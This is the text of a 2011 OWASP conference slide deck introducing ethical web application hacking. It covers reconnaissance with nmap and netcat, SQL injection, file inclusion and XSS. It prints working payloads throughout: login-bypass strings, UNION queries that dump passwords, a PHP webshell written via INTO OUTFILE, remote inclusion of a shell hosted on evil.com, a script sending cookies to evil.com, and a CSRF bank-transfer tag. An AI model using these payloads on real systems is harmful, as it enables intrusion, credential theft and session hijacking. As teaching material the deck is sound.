syed-owaspdaykl2011_2

Introduction to Ethical Web Application Hacking

Syed Zainudeen

20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 1

OWASP DAY KL 2011, 20 September 2011

Overview

• Information Gathering

• SQL Injection

• File Inclusion

• XSS (Cross Site Scripting)



Information Gathering

“Finding an apple in a basket will be like finding a needle in a haystack if you don’t

know what an apple is !”

- Syed Zainudeen -


Why we need to know the target?

• Speed up the process of finding vulnerabilities

• Increase the chance of a successful exploitation


What do we want to know?

• Address of our target

• OS type

• Running services

• What type of service software

• Any info on the target


Tools to check IP address

• ping (?)

• nslookup

• host

• dig


mrzamri

Sticky Note

host and dig exixts on linux

Tools for OS fingerprinting

• nmap

– Usage: nmap -O <host>

nmap -O www.website.com

• xprobe2

– Usage: xprobe2 <host>

xprobe2 www.website.com


mrzamri

Sticky Note

the output in form of propability

Why we need to know the OS?

• Lets say that we found a vulnerability in a system that allows us to execute commands on the remote OS

• We send the command:

net user hacker 123456 /add

• However, we scratch our head wondering why the command didn’t work

• It WONT work if the target is a linux machine


nmap in action


Tools to scan for services

• nmap

– nmap -sT <host> • TCP Connect scan

nmap -sT www.website.com • SYN scan

nmap -sS www.website.com • UDP scan

nmap -sU www.website.com

• amap (discovering services on nonstandard ports)

– amap <host> <port>

amap www.website.com 49152


mrzamri

Sticky Note

port 3389 - remote desktop

Service software detection tool

• Automated: – nmap –sV <host>

nmap –sV www.website.com

• Manual: – nc / telnet/putty (text based services)

• Usage: nc <host> <port>

– openssl (text based services + SSL) • Usage: openssl s_client –connect <host>:<port>


HTTP banner grabbing

• Example:

– Using netcat: nc www.google.com 80

– Using telnet: telnet www.website.com 80

HEAD / HTTP/1.0 Host: www.google.com

HEAD / HTTP/1.0 Host: www.website.com

= Enter

HTTP banner grabbing demo


Additional ways to get information

• Google

• Spidering

• Error messages


SQL Injection


“SQL injection is like asking for extra plate/tissue/etc when all the waiter is

expecting is your order”

- Syed Zainudeen -


What is SQL injection ?

• SQL injection - inserting specially crafted SQL instructions for arbitrary SQL code execution

• Example: Inserting ' OR 1=1 # to bypass login page


mrzamri

Sticky Note

192.168.56.101

Login bypass


Logged in as admin !


How did it works ?

• Behind the scene, there is an SQL instruction being executed

SELECT * FROM accounts WHERE username=' $user ' AND

password=' $pass '

• $user and $pass and are taken from the input box.


How did it works ? (injection)

SELECT * FROM accounts WHERE username='$user' AND

password='$pass'

• If $user equals ' OR 1=1 # and $pass is null then

the SQL instruction will be

SELECT * FROM accounts WHERE username=' ' OR 1=1 #' AND

password=''


How did it works ? (comment)

• # is a special character in MySQL which means line comment (similar to // for C) and anything that follows after it will be ignored

• The SQL without the comment is

SELECT * FROM accounts WHERE username='' OR 1=1 #' AND

password=''


How did it works ? (comparison)

SELECT * FROM accounts WHERE username='' OR 1=1

• 1=1 is a comparison that will result to a boolean value of TRUE (since 1 will always be equal to 1)

• The OR operator means that either of the condition must be true


How did it works ? (Boolean logic)

• Therefore:



Boolean: ? OR TRUE Truth table for OR

Condition Result

FALSE or FALSE FALSE

FALSE or TRUE TRUE

TRUE or TRUE TRUE

TRUE or FALSE TRUE

Means: ? OR TRUE equals TRUE

How did it works ? (eureka!)

• Therefore the statement will always be true and this will be executed


• All the rows will be returned but since the first row is the username admin, we logs in as admin


Exploits of a Mom

xkcd.com/327


Spotting a vulnerable application

• The easiest way to find an SQL injection vuln is by inserting a single quote ( ' )

• An error message will be displayed (if the server is configured to display error)

• Other possible responses might be:

– a blank page

– a web page with some of the elements missing


The single quote test


Exploting SQL injection vuln

• 3 rules of a successful exploitation

– Rule 1: The is no master SQL injection string !

– Rule 2: Think as a developer !

– Rule 3: Try, try and try !

• BTW, the rules won't help if you are facing a secure web application


Exploitation: Bypassing login page

• Common login bypass strings:

' OR 1=1 #

' OR 1=1 -- '

' OR ''='

' OR 1=1 OR '

' OR 1=1 LIMIT 1#

….

… use your imagination (and logic)


Exploitation example: Login bypass


What can be done with SQLi ?

• Bypass login page (done !)

• Displaying private data

• Install a webshell


Displaying private data

• DONE using UNION <SQL query> #comment

' union select group_concat(<columns>),2,3 from <table name> #

Examples:

' union select group_concat(user,password),2,3 from users#

' union select group_concat(user,':',password),2,3 from

users#


Pwned !


Installing a webshell

• This is done using SELECT … INTO OUTFILE ….

• If we were attacking a xampp installation:

' union select '<?php system($_GET[c]); ?>',2,3 into outfile 'c:/xampp/htdocs/test.php' #

Note: • system() is a special PHP function to execute system

commands • File permission is required in order to use INTO OUTFILE


Pwned !!!

• We access the shell through:

http://<host>/test.php?c=<OS command>


File Inclusion Attack


“File injection is akin to how bacteriophage injects bacteria with its genetic material”

- Syed Zainudeen -


File inclusion in web applications

• Sometimes web application developers code their application using separate modules in multiple files

• When needed, these modules can simply be included into their web app

• In PHP this is done by using include(), include_once(), require() or require_once()


Sample URL pattern

• Sample URL patterns that might use include():

http://website.com/?page=login.php

http://website.com/?page=register.php

http://website.com/?page=main.php

• The site most probably be coded like this


<?php

$page = $_GET['page'];

include($page);

?>

include()

• Include() and other similar function has the ability to include any file to be as part as the script that is currently executing

• Depending on the server configuration, include() can access not just local file path, but also web URLs


Sample attack

• What if an attacker prepares a webshell script <?php system($_GET[c]); ?> and host it at http://evil.com/script.txt

• All the attacker needs to do now is to invoke the web application with this URL:

http://website.com/?page=http://evil.com/script.txt&c=ls


Spotting a vulnerable app

• All we have to do is prepend the suspected variables (GET/POST/injected variables) with ../

• Example: http://abc.com/?page=../register.php


Possible target of File Inclusion attack


Dot dot slash test in action


Types of File Inclusion Attack

• There are 2 types of File Inclusion attack

–Remote File Inclusion (RFI) • Easy to exploit (Very very dangerous !!!)

– Local File Inclusion (LFI) • Harder to inject code


RFI exploitation

1. Find a vulnerable URL (e.g. http://192.168.0.1/web/index.php?page=login.php)

2. Host our script on a web server (e.g. http://evil.com/shell.txt)

3. Exploit it (run our script) by requesting http://192.168.0.1/web/index.php?page=http://evil.com/shell.txt


RFI exploitation (cont.)

• Content of shell.txt

• In order to execute dir command, we can request for the following URL

http://192.168.0.1/web/index.php?page=http://evil.com/shell.txt&c=dir


<?php system($_GET[c]); ?>

PWNED !!!


The LFI dilemma

• If a RFI attacks failed, we can opt for LFI

• But one big question remains,

HOW DO WE GET OUR MALICIOUS SCRIPT TO THE SERVER IN THE FIRST

PLACE ?


Getting your script to the server

• There are several ways to get your script to the server

– File/Image upload

– /proc/self/environ method

– Log file poisoning

• Once the script is accessible locally by the server, exploitation can proceed.


Cross Site Scripting (XSS)


“XSS, malicious content by user, for user”

- Syed Zainudeen -


What is XSS ?

• XSS is a vulnerability that allows an attacker to inject client-side code on a webpage

• The client-side code can be of any client-side scripting language; Javascript, CSS, HTML, etc


How can it happen ?

• An attacker inserts specially crafted input string that allow the browser to interpret it as valid code

• Example:

What's your name:

Ali<script>alert('XSS')</script>


XSS in action


Types of XSS

• There are 2 types of XSS

–Reflected XSS (non-persistent)

– Stored XSS (persistent)


Reflected vs Stored

• In a reflected XSS, the injected string is used only once and discarded (not stored)

– E.g. search function

• In a stored XSS, the injected string is first stored in a DB and later loaded for display

– E.g. forum, guestbook, log


Reflected XSS

• The vulnerable page will only display user injected script if he/she follows a certain link/URL

• The malicious script is visible in the URL (might be in encoded form). For example: http://abc.com/search?q=ball<script>alert(/XSS/)</script>


Reflected XSS in action


Stored XSS

• The vulnerable page will display user injected script just by visiting to a vulnerable site (that has been injected)

• The malicious script in not visible in the URL (since it is usually loaded from DB)


Stored XSS in action


What can we do with XSS?

• There's a lot that can be done with XSS vuln

– Webpage defacement (?)

– Cross Site Request Forgery (CSRF)

– Cookie stealing


Webpage defacement

• This is effective against stored XSS

• Creates an illusion of being hacked ! (Not a real hack)

• The way to deface is up to the creativity of the attacker. Some examples: – <script>document.body.innerHTML="Hacked!"</script>

– <iframe src="http://www.google.com" style="position:absolute; top:0; left:0; width:100% ;height:100%"></iframe>


XSS web defacement (script)


XSS web defacement (iframe)


Cross Site Request Forgery (CSRF)

• CSRF is a type of attack that enables an attacker to do things on behalf of the victim by using the trust that a webpage has on the victim

• How: The attacker send instructions to a victim, to be executed (by the victim) using session information of the victim.


CSRF explained

• Let say that a user is logged in to a bank (Low Security Bank, lsbank.com)

• A user then browse to other sites that contains the following (XSS injected) code:

<img

src="http://lsbank.com/transfer?amount=1000&to=hacker_acc

&submit=true" />


CSRF explained (cont.)

• The img tag will cause a GET request to the bank (lsbank.com)

• Since the user is currently logged in to the bank, he/she will unknowingly transfer $1000 to hacker_acc

• XSS + unsecured site = dangerous combination


Cookie stealing

• In CSRF, an attacker issues a command that gets executed using session information (cookie) of a victim

• The cookie is not captured in CSRF. The attacker doesn't know the victim's cookie.

• But using XSS, we can steal user cookie…


Why cookie is important ?

• When we log in to a website, the only way that the site knows who we are is based on the cookie information that our browser send.

• If an attacker is able to steal cookie data from a victim, the attacker can basically do anything as the victim


Limitation of XSS cookie stealing

• XSS can be used to steal cookie but is has a limitation.

• XSS can only be used to steal user cookie of the site that is vulnerable to XSS

• Let say that facebook.com has an XSS vuln, an attacker can steal user cookie for facebook.com and use it to log in as the victim.


How to read cookie value?

• Javascript can be used to read user cookie

• We can view cookie data by using:

alert(document.cookie);

• document.cookie is a javascript variable that can view all non HTTP-Only cookie


Displaying user cookie


XSS cookie stealing

• An attacker can steal user cookie by using:

<script> document.write('<img src="http://evil.com/?dat=' +

escape(document.cookie) + ' " /> '); </script>

• This script will cause the user cookie to be sent to evil.com

• The attacker can log the cookies using any server side scripting language at evil.com


Modifying browser cookie

• The stolen cookies can then be retrieved and injected to the attacker's web browser

• There are many ways to modify a browser's cookie – Manually

• javascript injection at the address bar

– Using automated tools • Firecookie browser extension

• TamperData

• Paros proxy

• etc


Browsing with stolen cookie

• Once the victim's cookie have been planted, all that needs to be done is simply point the browser to the target site

• The attacker's browser will present the stolen cookie to the web server and possibly, the web server will identify the request as coming from the victim

• The attacker just hijacked the victim's session using XSS !


How session hijacking works


Web server Web Admin

SESSIONID=i45h0t3w4h

Normal User

Each user has unique session ID stored in their browser's cookie. The web server uses the session ID to differentiate between normal user and web admin

How session hijacking works (cont.)




Due to an XSS vulnerability in Web Server, an attacker has injected some javascript code that steals visitor's session ID .

Evil.com


Attacker

How session hijacking works (cont.)




The attacker then uses the stolen session ID to communicate with the web server. The attacker will be treated as the Web Admin and can do whatever the Web Admin can, since he/she has the session ID of the Web Admin.

Attacker

Thank you !


Documents

syed-owaspdaykl2011_2